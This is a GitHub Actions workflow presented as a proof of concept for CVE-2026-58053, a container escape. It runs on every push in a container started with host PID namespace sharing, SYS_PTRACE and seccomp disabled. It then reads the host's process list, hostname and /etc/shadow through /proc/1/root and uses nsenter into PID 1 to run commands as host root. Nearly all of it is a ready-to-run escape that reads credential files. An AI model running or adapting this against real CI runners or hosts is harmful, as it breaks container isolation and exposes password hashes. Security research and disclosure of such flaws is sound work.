name: CVE-2026-58053-poc on: [push, workflow_dispatch] jobs: escape: runs-on: ubuntu-latest container: image: ubuntu:22.04 options: --pid=host --cap-add=SYS_PTRACE --security-opt seccomp=unconfined steps: - name: escape run: | echo '[*] CVE-2026-58053 — container escape proof' echo '[*] container pid ns:' $(readlink /proc/self/ns/pid) echo '[*] host pid1 cmdline:' $(cat /proc/1/cmdline | tr '\0' ' ') echo '[*] host hostname (proc):' $(cat /proc/1/root/etc/hostname 2>/dev/null) echo '[*] host /etc/shadow (first 5 lines):' cat /proc/1/root/etc/shadow 2>/dev/null | head -5 echo '[*] nsenter id (host root):' nsenter -t 1 -m -u -i -n -p -- id 2>/dev/null echo '[*] custom cmd: cat /etc/shadow' nsenter -t 1 -m -u -i -n -p -- sh -c 'cat /etc/shadow' 2>/dev/null